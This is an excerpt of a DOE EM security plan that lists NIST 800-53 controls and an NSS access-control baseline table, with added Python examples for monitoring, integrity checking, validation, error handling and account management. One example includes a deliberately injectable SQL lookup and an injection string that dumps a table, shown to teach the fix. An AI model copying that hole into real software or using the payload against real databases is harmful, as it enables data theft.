SI-4(a)(2) Information System Monitoring
  NIST control requirement: The organization: Monitors the information system to detect: Unauthorized local, network, and remote connections;

SI-4(b) Information System Monitoring
  NIST control requirement: The organization: Identifies unauthorized use of the information system through [Assignment: organization-defined techniques and methods];

SI-4(c) Information System Monitoring
  NIST control requirement: The organization: Deploys monitoring devices: (i) strategically within the information system to collect organization-determined essential information; and (ii) at ad hoc locations within the system to track specific types of transactions of interest to the organization;

SI-4(d) Information System Monitoring
  NIST control requirement: The organization: Protects information obtained from intrusion-monitoring tools from unauthorized access, modification, and deletion;
SI-4(e) Information System Monitoring
  NIST control requirement: The organization: Heightens the level of information system monitoring activity whenever there is an indication of increased risk to organizational operations and assets, individuals, other organizations, or the Nation based on law enforcement information, intelligence information, or other credible sources of information;

SI-4(f) Information System Monitoring
  NIST control requirement: The organization: Obtains legal opinion with regard to information system monitoring activities in accordance with applicable federal laws, Executive Orders, directives, policies, or regulations; and

SI-4(g) Information System Monitoring
  NIST control requirement: The organization: Provides [Assignment: organization-defined information system monitoring information] to [Assignment: organization-defined personnel or roles] [Selection (one or more): as needed; [Assignment: organization-defined frequency]].

SI-4(2) Information System Monitoring
  NIST control requirement: The organization employs automated tools to support near real-time analysis of events.
SI-4(4) Information System Monitoring
  NIST control requirement: The information system monitors inbound and outbound communications traffic [Assignment: organization-defined frequency] for unusual or unauthorized activities or conditions.
  EM supplemental guidance: Unusual/unauthorized activities or conditions include, for example, internal traffic that indicates the presence of malicious code within an information system or propagating among system components, the unauthorized export of information, or beaconing to an external information system. Evidence of malicious code is used to identify potentially compromised information systems or information system components.
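Two of the SI-4(4) indicators named in the guidance, beaconing to an external system and unauthorized export of information, can be pulled out of ordinary flow records. The following is an added example written for this page, not RMAIP or EM site code, that does so over a constructed flow log: a beacon shows up as an internal-to-external pair whose connection intervals are nearly constant (low coefficient of variation), and bulk export as a pair whose total outbound volume is out of proportion. The flow records, the internal address ranges and the thresholds are assumptions a site would replace with its own.

```python
"""Flag beaconing and bulk export in outbound flow records.

Added example (not part of the DOE EM RMAIP). The flow log, address ranges and
thresholds are constructed.
"""
import statistics
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Internal address space (assumption: RFC 1918 ranges).
INTERNAL = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]

# Constructed sample: "ts,src,dst,dport,bytes", ts in seconds; RFC 5737 external addresses.
# 10.0.1.15 contacts 198.51.100.23 every ~300 s; 10.0.1.22 browses 203.0.113.10 irregularly
# but pushes a lot of data; the SMB flows are internal-only and ignored.
SAMPLE_FLOWS = """\
1000,10.0.1.15,198.51.100.23,443,512
1300,10.0.1.15,198.51.100.23,443,498
1598,10.0.1.15,198.51.100.23,443,530
1900,10.0.1.15,198.51.100.23,443,501
2201,10.0.1.15,198.51.100.23,443,515
2499,10.0.1.15,198.51.100.23,443,507
2800,10.0.1.15,198.51.100.23,443,520
1010,10.0.1.22,203.0.113.10,443,84000
1050,10.0.1.22,203.0.113.10,443,12000
1400,10.0.1.22,203.0.113.10,443,9100
1410,10.0.1.22,203.0.113.10,443,250000
1900,10.0.1.22,203.0.113.10,443,3000
2900,10.0.1.22,203.0.113.10,443,7800
1200,10.0.1.15,10.0.0.5,445,2048
1500,10.0.1.15,10.0.0.5,445,2048
"""


def is_internal(addr):
    a = ip_address(addr)
    return any(a in net for net in INTERNAL)


def parse_flows(text):
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, nbytes = line.split(",")
        flows.append((int(ts), src, dst, int(dport), int(nbytes)))
    return flows


def outbound_by_pair(flows):
    """Group internal-to-external flows by (src, dst, dport) as (ts, bytes) events."""
    pairs = defaultdict(list)
    for ts, src, dst, dport, nbytes in flows:
        if is_internal(src) and not is_internal(dst):
            pairs[(src, dst, dport)].append((ts, nbytes))
    return pairs


def beacon_candidates(flows, min_count=6, max_cv=0.2):
    """Pairs with at least min_count connections whose intervals are nearly constant.

    Returns (key, mean_interval_seconds, coefficient_of_variation)."""
    hits = []
    for key, events in outbound_by_pair(flows).items():
        if len(events) < min_count:
            continue
        times = sorted(ts for ts, _ in events)
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            hits.append((key, round(mean), round(cv, 3)))
    return hits


def bulk_exports(flows, threshold_bytes=100_000):
    """Pairs whose total outbound volume exceeds the threshold (possible unauthorized export)."""
    totals = {key: sum(n for _, n in events) for key, events in outbound_by_pair(flows).items()}
    return [(key, total) for key, total in totals.items() if total > threshold_bytes]


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print("beacons:", beacon_candidates(flows))
    print("exports:", bulk_exports(flows))
```

Interval regularity is the simplest beacon signal and the one malware most often defeats with jitter; a real detector lowers max_cv only after learning what legitimate agents (update checks, telemetry) look like on the site's own network, which is why the page's monitoring objectives are left organization-defined.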
SI-4(5) Information System Monitoring
  NIST control requirement: The information system alerts [Assignment: organization-defined personnel or roles] when the following indications of compromise or potential compromise occur: [Assignment: organization-defined compromise indicators].

SI-5(a) Security Alerts, Advisories, and Directives
  NIST control requirement: The organization: Receives information system security alerts, advisories, and directives from [Assignment: organization-defined external organizations] on an ongoing basis;
  Recommended organization-defined value: JC3 and EM MIPP

SI-5(b) Security Alerts, Advisories, and Directives
  NIST control requirement: The organization: Generates internal security alerts, advisories, and directives as deemed necessary;
SI-5(c) Security Alerts, Advisories, and Directives
  NIST control requirement: The organization: Disseminates security alerts, advisories, and directives to: [Selection (one or more): [Assignment: organization-defined personnel or roles]; [Assignment: organization-defined elements within the organization]; [Assignment: organization-defined external organizations]]; and

SI-5(d) Security Alerts, Advisories, and Directives
  NIST control requirement: The organization: Implements security directives in accordance with established time frames, or notifies the issuing organization of the degree of noncompliance.

SI-7 Software and Information Integrity
  NIST control requirement: The organization employs integrity verification tools to detect unauthorized changes to [Assignment: organization-defined software, firmware, and information].

SI-7(1) Software and Information Integrity
  NIST control requirement: The information system performs an integrity check of [Assignment: organization-defined software, firmware, and information] [Selection (one or more): at startup; at [Assignment: organization-defined transitional states or security-relevant events]; [Assignment: organization-defined frequency]].
  Recommended organization-defined value: Quarterly
  EM supplemental guidance: The site employs integrity verification applications on key information systems (e.g., servers that process and store CUI) to look for evidence of information tampering, errors, and omissions. The site employs good software engineering practices with regard to commercial off-the-shelf integrity mechanisms (e.g., parity checks, cyclical redundancy checks, cryptographic hashes) and uses tools to automatically monitor the integrity of the information system and the applications it hosts.
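The cryptographic-hash mechanism named in the SI-7(1) guidance amounts to a baseline of digests taken when the system is known-good and a later pass that reports what changed. The following is an added example written for this page, not RMAIP or EM site code, that builds such a baseline with SHA-256, seals it with an HMAC so that an attacker who alters a file cannot also quietly update its recorded digest, and reports modified, added and removed files. The demo runs against a temporary directory it creates itself; the sealing key and file contents are constructed, and the assumption is that in practice the key and sealed baseline are kept off the monitored host.

```python
"""Build and re-check a sealed SHA-256 integrity baseline for a directory tree.

Added example (not part of the DOE EM RMAIP). The directory, files and key are constructed.
"""
import hashlib
import hmac
import json
import tempfile
from pathlib import Path


def hash_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map of relative POSIX path -> SHA-256 for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def seal(baseline, key):
    """HMAC-SHA256 over the canonical JSON form of the baseline."""
    payload = json.dumps(baseline, sort_keys=True).encode()
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def verify_seal(baseline, key, tag):
    return hmac.compare_digest(seal(baseline, key), tag)


def compare(baseline, current):
    """Differences between the sealed baseline and a fresh scan."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario: baseline a tree, tamper with it, re-check it."""
    key = b"constructed-demo-key-keep-off-host"   # assumption: stored off the monitored system
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "service").write_bytes(b"original binary")
        (root / "etc.conf").write_text("listen=443\n")
        baseline = build_baseline(root)
        tag = seal(baseline, key)

        (root / "bin" / "service").write_bytes(b"trojaned binary")   # modified
        (root / "bin" / "dropper").write_bytes(b"new file")           # added
        (root / "etc.conf").unlink()                                  # removed
        current = build_baseline(root)

        # An attacker who edits the stored baseline to match the trojaned file
        # cannot reproduce the seal without the key.
        tampered = {**baseline, "bin/service": current["bin/service"]}
        return {
            "baseline_intact": verify_seal(baseline, key, tag),
            "baseline_tampered_detected": not verify_seal(tampered, key, tag),
            "diff": compare(baseline, current),
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run quarterly (the page's value) and at the security-relevant events the control lists, the report is only as good as the baseline's protection, which is what the seal is for; the same check at startup catches changes made while the system was offline.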
SI-7(7) Software and Information Integrity
  NIST control requirement: The organization incorporates the detection of unauthorized [Assignment: organization-defined security-relevant changes to the information system] into the organizational incident response capability.

SI-8(a) Spam Protection
  NIST control requirement: The organization: Employs spam protection mechanisms at information system entry and exit points to detect and take action on unsolicited messages; and

SI-8(b) Spam Protection
  NIST control requirement: The organization: Updates spam protection mechanisms when new releases are available in accordance with organizational configuration management policy and procedures.

SI-8(1) Spam Protection
  NIST control requirement: The organization centrally manages spam protection mechanisms.

SI-8(2) Spam Protection
  NIST control requirement: The information system automatically updates spam protection mechanisms.

SI-10 Information Input Validation
  NIST control requirement: The information system checks the validity of [Assignment: organization-defined information inputs].
  EM supplemental guidance: Rules for checking the valid syntax and semantics of information system inputs (e.g., character set, length, numerical range, acceptable values) are in place to verify that inputs match specified definitions for format and content. Inputs passed to interpreters are prescreened to prevent the content from being unintentionally interpreted as commands.
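The last sentence of the SI-10 guidance is the one that matters most in practice: input that reaches an interpreter (SQL, a shell, LDAP) is interpreted as command unless the boundary between data and command is enforced. The following is an added example written for this page, not RMAIP or EM site code, that shows the failure and the fix side by side against a live SQLite database: a lookup that splices the input into the SQL text is driven to return every row, while the hardened lookup applies a syntax rule (character set and length), a semantic rule (acceptable values) and then binds the value as a parameter. The table, rows and format rules are constructed.

```python
"""Input validation and interpreter prescreening, shown against a live SQLite database.

Added example (not part of the DOE EM RMAIP). Table, rows and rules are constructed.
"""
import re
import sqlite3

USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")   # character set and length rule (constructed)


def validate_username(value):
    """Syntax check: lowercase letter first, then [a-z0-9_], 3 to 32 characters in all."""
    if not isinstance(value, str) or not USERNAME_RE.fullmatch(value):
        raise ValueError("username fails format rule")
    return value


def validate_clearance(value, allowed=("L", "M", "H")):
    """Semantic check: acceptable values only."""
    if value not in allowed:
        raise ValueError("clearance not in allowed set")
    return value


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, clearance TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "H"), ("bob", "M"), ("carol", "L")])
    return conn


def lookup_vulnerable(conn, username):
    """Deliberately unsafe: the input becomes part of the SQL command text."""
    sql = f"SELECT name, clearance FROM users WHERE name = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Prescreen with the allowlist, then bind the value so it can only ever be data."""
    return conn.execute("SELECT name, clearance FROM users WHERE name = ?",
                        (validate_username(username),)).fetchall()


def set_clearance_safe(conn, username, clearance):
    """Both syntax and semantics checked before the interpreter sees anything."""
    conn.execute("UPDATE users SET clearance = ? WHERE name = ?",
                 (validate_clearance(clearance), validate_username(username)))
    return conn.execute("SELECT clearance FROM users WHERE name = ?", (username,)).fetchone()[0]


def rejected(fn, *args):
    """True if the validator or lookup refuses the input with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


INJECTION = "x' OR '1'='1"   # constructed attack string

if __name__ == "__main__":
    conn = open_db()
    print("vulnerable:", lookup_vulnerable(conn, INJECTION))   # every row comes back
    print("safe rejects:", rejected(lookup_safe, conn, INJECTION))
    print("safe:", lookup_safe(conn, "alice"))
```

Parameter binding alone would already stop the injection; the allowlist in front of it is what the guidance means by prescreening, and it is what protects the places (log lines, shell arguments, LDAP filters) that have no binding API.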
SI-11(a) Error Handling
  NIST control requirement: The information system: Generates error messages that provide information necessary for corrective actions without revealing information that could be exploited by adversaries; and
  EM supplemental guidance: The structure and content of error messages are carefully considered by the organization. The extent to which the information system is able to identify and handle error conditions is guided by organizational policy and operational requirements. Error messages should be made available to system administrators and not be sent to the user or potential attacker.

SI-11(b) Error Handling
  NIST control requirement: The information system: Reveals error messages only to [Assignment: organization-defined personnel or roles].
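SI-11(a) and (b) together say that the detail needed for corrective action (exception type, message, stack, file paths) must exist, but only administrators may see it; the user gets enough to open a ticket. The following is an added example written for this page, not RMAIP or EM site code, that implements that split: every failure is logged in full with a correlation reference, and the caller receives either the generic message plus reference or, for an administrative role, the detail. The roles, the log sink and the failing operation (a configuration file that does not exist) are constructed.

```python
"""Error handling that gives users a reference and administrators the detail.

Added example (not part of the DOE EM RMAIP). Roles, log sink and failing operation are constructed.
"""
import logging
import traceback
import uuid

log = logging.getLogger("app.errors")
log.setLevel(logging.ERROR)
RECORDS = []   # stand-in for the administrators' log sink (constructed)


class _ListHandler(logging.Handler):
    def emit(self, record):
        RECORDS.append(self.format(record))


log.addHandler(_ListHandler())

ADMIN_ROLES = {"sysadmin", "security"}   # SI-11(b): roles allowed to see detailed errors (assumption)
GENERIC = "The request could not be completed. Quote the reference when contacting support."


def handle_error(exc, role):
    """Log everything; return only what the caller's role is allowed to see."""
    ref = uuid.uuid4().hex[:12]
    log.error("ref=%s type=%s msg=%s\n%s", ref, type(exc).__name__, exc,
              "".join(traceback.format_exception(type(exc), exc, exc.__traceback__)))
    if role in ADMIN_ROLES:
        return {"error": f"{type(exc).__name__}: {exc}", "ref": ref}
    return {"error": GENERIC, "ref": ref}


def load_config(path, role):
    """A failing operation whose exception text carries a path the user must not see."""
    try:
        with open(path, "rb") as f:
            return {"ok": True, "size": len(f.read())}
    except OSError as exc:
        return handle_error(exc, role)


if __name__ == "__main__":
    print("user sees:     ", load_config("/nonexistent/app/secret.conf", "user"))
    print("sysadmin sees: ", load_config("/nonexistent/app/secret.conf", "sysadmin"))
    print("log holds:     ", RECORDS[-1].splitlines()[0])
```

The reference is what makes the generic message actionable: support can find the full record by it, and nothing about the file system, the database or the framework reaches the person who triggered the fault.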
SI-12 Information Handling and Retention
  NIST control requirement: The organization handles and retains information within the information system and information output from the system in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and operational requirements.
  EM supplemental guidance: The output handling and retention requirements cover the full life cycle of the information, in some cases extending beyond the disposal of the information system.

SI-16 Memory Protection
  NIST control requirement: The information system implements [Assignment: organization-defined security safeguards] to protect its memory from unauthorized code execution.
DOE EM RMAIP Version 5.1
149 of 266
Appendix B – NSS Security Controls

Based on early assessments of NSS security controls using CNSSI 1253 and NIST SP 800-53 Rev 3 controls, EM has determined that most systems will be categorized as C = M, I = M, and A = M; or C = M, I = M, and A = L; or C = M, I = L, and A = L. Below are the controls that should be addressed for each categorization and configuration (e.g., networked or stand-alone). "No" in the column for either a stand-alone or network configuration means that the control does not apply and does not have to be implemented. "Yes" means that it should be addressed and a justification given if the control is tailored out. A site may decide to deploy a control that does not apply depending on its risk management strategy. Contracting Officers are not to require that each and every control listed in this table be implemented.

Cntl #: Lists the NIST control abbreviation
Control Name: Lists the name of the control requirement
CIA (LMH): Lists each CNSSI control requirement by Confidentiality (C), Integrity (I), and Availability (A) and Low (L), Moderate (M), and High (H)
NNN (LMH): Lists the NIST 800-53 Low (L), Moderate (M), and High (H) control selections associated with the CNSSI controls
NSS Stand Alone: Lists if the control is applicable to a NSS Stand-Alone PC
NSS Network: Lists if the control is applicable to NSS Networked PC(s)
Priority: Lists the NIST control priority
NIST Control Req: Lists the NIST control requirement

Table columns, in order: Cntl # | Control Name | C (L M H) | I (L M H) | A (L M H) | NIST (L M H) | NSS Stand Alone | NSS Network | Priority | NIST Control Requirement. Each row below gives the twelve C/I/A/NIST baseline marks as they appear; where a row shows fewer than twelve X marks, the extraction did not preserve which columns were blank, so the marks are reproduced as a count rather than assigned to columns.
AC-1 Access Control Policy and Procedures
  Baseline marks: X X X X X X X X X X X X (all twelve columns) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P1
  NIST control requirement: The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented access control policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the access control policy and associated access controls.
AC-2 Account Management
  Baseline marks: X X X X X X X (7 of 12) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P1
  NIST control requirement: The organization manages information system accounts, including: a) Identifying account types (i.e., individual, group, system, application, guest/anonymous, and temporary); b) Establishing conditions for group membership; c) Identifying authorized users of the information system and specifying access privileges; d) Requiring appropriate approvals for requests to establish accounts; e) Establishing, activating, modifying, disabling, and removing accounts; f) Specifically authorizing and monitoring the use of guest/anonymous and temporary accounts; g) Notifying account managers when temporary accounts are no longer required and when information system users are terminated, transferred, or information system usage or need-to-know/need-to-share changes; h) Deactivating: (i) temporary accounts that are no longer required; and (ii) accounts of terminated or transferred users; i) Granting access to the system based on: (i) a valid access authorization; (ii) intended system usage; and (iii) other attributes as required by the organization or associated missions/business functions; and j) Reviewing accounts [Assignment: organization-defined frequency].

AC-2(1) Account Management
  Baseline marks: X X X X X X X X (8 of 12) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P1
  NIST control requirement: The organization employs automated mechanisms to support the management of information system accounts.

AC-2(2) Account Management
  Baseline marks: X X X X X X X X (8 of 12) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P1
  NIST control requirement: The information system automatically terminates temporary and emergency accounts after [Assignment: organization-defined time period for each type of account].

AC-2(3) Account Management
  Baseline marks: X X X X X X X X (8 of 12) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P1
  NIST control requirement: The information system automatically disables inactive accounts after [Assignment: organization-defined time period].
AC-2(4) Account Management
  Baseline marks: X X X X X X X X (8 of 12) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P1
  NIST control requirement: The information system automatically audits account creation, modification, disabling, and termination actions and notifies, as required, appropriate individuals.

AC-2(5) Account Management
  Baseline marks: none | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P0
  NIST control requirement: The organization: a) Requires that users log out when [Assignment: organization-defined time period of expected inactivity and/or description of when to log out]; b) Determines normal time-of-day and duration usage for information system accounts; c) Monitors for atypical usage of information system accounts; and d) Reports atypical usage to designated organizational officials.
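AC-2(2), AC-2(3) and AC-2(5)(b)-(d) are the parts of account management that a scheduled job can enforce against a directory export: terminate temporary and emergency accounts whose period has elapsed, disable accounts idle past the inactivity period, and report logons outside an account's normal time-of-day window. The following is an added example written for this page, not RMAIP or EM site code, that does those three checks. The account records and logon events are constructed, and so is the 35-day inactivity period, since the page leaves both periods organization-defined.

```python
"""Account lifecycle checks for AC-2(2), AC-2(3) and AC-2(5).

Added example (not part of the DOE EM RMAIP). Records, windows and periods are constructed.
"""
from datetime import datetime, timedelta

INACTIVE_AFTER = timedelta(days=35)   # assumption; AC-2(3) leaves the period organization-defined


def to_terminate(accounts, now):
    """AC-2(2): temporary and emergency accounts whose time period has elapsed."""
    return sorted(a["name"] for a in accounts
                  if a["type"] in ("temporary", "emergency")
                  and a["expires"] is not None and now >= a["expires"])


def to_disable(accounts, now):
    """AC-2(3): enabled accounts with no logon inside the inactivity period.

    An account that has never logged on is measured from its creation date."""
    out = []
    for a in accounts:
        last = a["last_logon"] or a["created"]
        if a["enabled"] and now - last > INACTIVE_AFTER:
            out.append(a["name"])
    return sorted(out)


def atypical_logons(accounts, logons):
    """AC-2(5)(b)/(c): logons outside the account's normal time-of-day window [start, end)."""
    windows = {a["name"]: a["normal_hours"] for a in accounts}
    flagged = []
    for name, when in logons:
        start, end = windows[name]
        if not (start <= when.hour < end):
            flagged.append((name, when.isoformat()))
    return flagged


# Constructed sample directory export and logon events.
NOW = datetime(2014, 4, 1, 9, 0)
ACCOUNTS = [
    {"name": "jdoe", "type": "individual", "enabled": True, "created": datetime(2013, 1, 1),
     "last_logon": datetime(2014, 3, 30, 8, 5), "expires": None, "normal_hours": (7, 18)},
    {"name": "contractor7", "type": "temporary", "enabled": True, "created": datetime(2014, 3, 1),
     "last_logon": datetime(2014, 3, 20, 10, 0), "expires": datetime(2014, 3, 31), "normal_hours": (8, 17)},
    {"name": "ir-break-glass", "type": "emergency", "enabled": True, "created": datetime(2014, 3, 25),
     "last_logon": None, "expires": datetime(2014, 4, 2), "normal_hours": (0, 24)},
    {"name": "legacy-svc", "type": "system", "enabled": True, "created": datetime(2012, 1, 1),
     "last_logon": datetime(2014, 1, 15, 3, 0), "expires": None, "normal_hours": (0, 24)},
]
LOGONS = [
    ("jdoe", datetime(2014, 3, 30, 8, 5)),
    ("jdoe", datetime(2014, 3, 31, 2, 40)),
    ("contractor7", datetime(2014, 3, 20, 10, 0)),
]

if __name__ == "__main__":
    print("terminate:", to_terminate(ACCOUNTS, NOW))
    print("disable:  ", to_disable(ACCOUNTS, NOW))
    print("atypical: ", atypical_logons(ACCOUNTS, LOGONS))
```

The output feeds the notifications AC-2(4) asks for and the report to designated officials in AC-2(5)(d); the "normal hours" window here is a fixed tuple, where a real implementation derives it from the account's own logon history per AC-2(5)(b).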
AC-2(6) Account Management
  Baseline marks: none | NSS Stand Alone: (blank) | NSS Network: (blank) | Priority: (blank)
  NIST control requirement: The information system dynamically manages user privileges and associated access authorizations.

AC-2(7) Account Management
  Baseline marks: X X X X X X (6 of 12) | NSS Stand Alone: No | NSS Network: Yes | Priority: P1
  NIST control requirement: The organization: a) Establishes and administers privileged user accounts in accordance with a role-based access scheme that organizes information system and network privileges into roles; and b) Tracks and monitors privileged role assignments.

AC-3 Access Enforcement
  Baseline marks: X X X X X X X X X (9 of 12) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P1
  NIST control requirement: The information system enforces approved authorizations for logical access to the system in accordance with applicable policy.

AC-3(1) Access Enforcement
  Withdrawn.

AC-3(2) Access Enforcement
  Baseline marks: none | NSS Stand Alone: (blank) | NSS Network: (blank) | Priority: (blank)
  NIST control requirement: The information system enforces dual authorization, based on organizational policies and procedures for [Assignment: organization-defined privileged commands].
AC-3(3) Access Enforcement
  Baseline marks: none | NSS Stand Alone: (blank) | NSS Network: (blank) | Priority: (blank)
  NIST control requirement: The information system enforces [Assignment: organization-defined nondiscretionary access control policies] over [Assignment: organization-defined set of users and resources] where the policy rule set for each policy specifies: a) Access control information (i.e., attributes) employed by the policy rule set (e.g., position, nationality, age, project, time of day); and b) Required relationships among the access control information to permit access.

AC-3(4) Access Enforcement
  Baseline marks: X X X X X X (6 of 12) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P0
  NIST control requirement: The information system enforces a Discretionary Access Control (DAC) policy that: a) Allows users to specify and control sharing by named individuals or groups of individuals, or by both; b) Limits propagation of access rights; and c) Includes or excludes access to the granularity of a single user.

AC-3(5) Access Enforcement
  Baseline marks: none | NSS Stand Alone: (blank) | NSS Network: (blank) | Priority: (blank)
  NIST control requirement: The information system prevents access to [Assignment: organization-defined security-relevant information] except during secure, nonoperable system states.

AC-3(6) Access Enforcement
  Baseline marks: X (1 of 12) | NSS Stand Alone: Yes | NSS Network: Yes | Priority: P1
  NIST control requirement: The organization encrypts or stores off-line in a secure location [Assignment: organization-defined user and/or system information].

AC-4 Information Flow Enforcement
  Baseline marks: X X X X X X X X (8 of 12) | NSS Stand Alone: No | NSS Network: No | Priority: P1
  NIST control requirement: The information system enforces approved authorizations for controlling the flow of information within the system and between interconnected systems in accordance with applicable policy.

AC-4(1) Information Flow Enforcement
  Baseline marks: none | NSS Stand Alone: (blank) | NSS Network: (blank) | Priority: (blank)
  NIST control requirement: The information system enforces information flow control using explicit security attributes on information, source, and destination objects as a basis for flow control decisions.

AC-4(2) Information Flow Enforcement
  Baseline marks: none | NSS Stand Alone: (blank) | NSS Network: (blank) | Priority: (blank)
  NIST control requirement: The information system enforces information flow control using protected processing domains (e.g., domain type-enforcement) as a basis for flow control decisions.
AC-4(3) Information Flow Enforcement
The information system enforces dynamic information flow control based on policy that allows or disallows information flows based on changing conditions or operational considerations.
AC-4(4) Information Flow Enforcement
The information system prevents encrypted data from bypassing content-checking mechanisms.
AC-4(5) Information Flow Enforcement
The information system enforces [Assignment: organization-defined limitations on the embedding of data types within other data types].
AC-4(6) Information Flow Enforcement
The information system enforces information flow control on metadata.
AC-4(7) Information Flow Enforcement
The information system enforces [Assignment: organization-defined one-way flows] using hardware mechanisms.
AC-4(8) Information Flow Enforcement
The information system enforces information flow control using [Assignment: organization-defined security policy filters] as a basis for flow control decisions.
AC-4(9) Information Flow Enforcement
The information system enforces the use of human review for [Assignment: organization-defined security policy filters] when the system is not capable of making an information flow control decision.
AC-4(10) Information Flow Enforcement
The information system provides the capability for a privileged administrator to enable/disable [Assignment: organization-defined security policy filters].
AC-4(11) Information Flow Enforcement
The information system provides the capability for a privileged administrator to configure [Assignment: organization-defined security policy filters] to support different security policies.
AC-4(12) Information Flow Enforcement
The information system, when transferring information between different security domains, identifies information flows by data type specification and usage.
AC-4(13) Information Flow Enforcement
The information system, when transferring information between different security domains, decomposes information into policy-relevant subcomponents for submission to policy enforcement mechanisms.
AC-4(14) Information Flow Enforcement
The information system, when transferring information between different security domains, implements policy filters that constrain data structure and content to [Assignment: organization-defined information security policy requirements].
AC-4(15) Information Flow Enforcement
The information system, when transferring information between different security domains, detects unsanctioned information and prohibits the transfer of such information in accordance with the security policy.
AC-4(16) Information Flow Enforcement
The information system enforces security policies regarding information on interconnected systems.
AC-4(17) Information Flow Enforcement
The information system: a) Uniquely identifies and authenticates source and destination domains for information transfer; b) Binds security attributes to information to facilitate information flow policy enforcement; and c) Tracks problems associated with the security attribute binding and information transfer.
AC-5 Separation Of Duties X X X X X X X X Yes Yes P1
The organization: a) Separates duties of individuals as necessary, to prevent malevolent activity without collusion; b) Documents separation of duties; and c) Implements separation of duties through assigned information system access authorizations.
AC-6 Least Privilege X X X X X X X X Yes Yes P1
The organization employs the concept of least privilege, allowing only authorized accesses for users (and processes acting on behalf of users) which are necessary to accomplish assigned tasks in accordance with organizational missions and business functions.
AC-6(1) Least Privilege X X X X X X X X Yes Yes P1
The organization explicitly authorizes access to [Assignment: organization-defined list of security functions (deployed in hardware, software, and firmware) and security-relevant information].
AC-6(2) Least Privilege X X X X X X X X Yes Yes P1
The organization requires that users of information system accounts, or roles, with access to [Assignment: organization-defined list of security functions or security-relevant information], use non-privileged accounts, or roles, when accessing other system functions, and if feasible, audits any use of privileged accounts, or roles, for such functions.
AC-6(3) Least Privilege
The organization authorizes network access to [Assignment: organization-defined privileged commands] only for compelling operational needs and documents the rationale for such access in the security plan for the information system.
AC-6(4) Least Privilege
The information system provides separate processing domains to enable finer-grained allocation of user privileges.
AC-6(5) Least Privilege X X X X X X Yes Yes P0
The organization limits authorization to super user accounts on the information system to designated system administration personnel.
AC-6(6) Least Privilege X X Yes Yes P0
The organization prohibits privileged access to the information system by non-organizational users.
AC-7 Unsuccessful Login Attempts X X X X X X X X X X X X Yes Yes P2
The information system: a) Enforces a limit of [Assignment: organization-defined number] consecutive invalid login attempts by a user during a [Assignment: organization-defined time period]; and b) Automatically [Selection: locks the account/node for an [Assignment: organization-defined time period]; locks the account/node until released by an administrator; delays next login prompt according to [Assignment: organization-defined delay algorithm]] when the maximum number of unsuccessful attempts is exceeded. The control applies regardless of whether the login occurs via a local or network connection.
AC-7(1) Unsuccessful Login Attempts X X X X Yes Yes P0
The information system automatically locks the account/node until released by an administrator when the maximum number of unsuccessful attempts is exceeded.
AC-7(2) Unsuccessful Login Attempts
The information system provides additional protection for mobile devices accessed via login by purging information from the device after [Assignment: organization-defined number] consecutive, unsuccessful login attempts to the device.
AC-8 System Use Notification X X X X X X X X X Yes Yes P1
The information system: a) Displays an approved system use notification message or banner before granting access to the system that provides privacy and security notices consistent with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance and states that: (i) users are accessing a U.S. Government information system; (ii) system usage may be monitored, recorded, and subject to audit; (iii) unauthorized use of the system is prohibited and subject to criminal and civil penalties; and (iv) use of the system indicates consent to monitoring and recording; b) Retains the notification message or banner on the screen until users take explicit actions to log on to or further access the information system; and c) For publicly accessible systems: (i) displays the system use information when appropriate, before granting further access; (ii) displays references, if any, to monitoring, recording, or auditing that are consistent with privacy accommodations for such systems that generally prohibit those activities; and (iii) includes in the notice given to public users of the information system, a description of the authorized uses of the system.
AC-9 Previous Logon (Access) Notification X X No No P0
The information system notifies the user, upon successful logon (access), of the date and time of the last logon (access).
AC-10 Concurrent Session Control X X X X X Yes Yes P2
The information system limits the number of concurrent sessions for each system account to [Assignment: organization-defined number].
AC-11 Session Lock X X X X X X X X Yes Yes P3
The information system: a) Prevents further access to the system by initiating a session lock after [Assignment: organization-defined time period] of inactivity or upon receiving a request from a user; and b) Retains the session lock until the user reestablishes access using established identification and authentication procedures.
AC-11(1) Session Lock X X X Yes Yes P0
The information system session lock mechanism, when activated on a device with a display screen, places a publicly viewable pattern onto the associated display, hiding what was previously visible on the screen.
AC-14 Permitted Actions Without Identification Or Authentication X X X X X X X X X Yes Yes P1
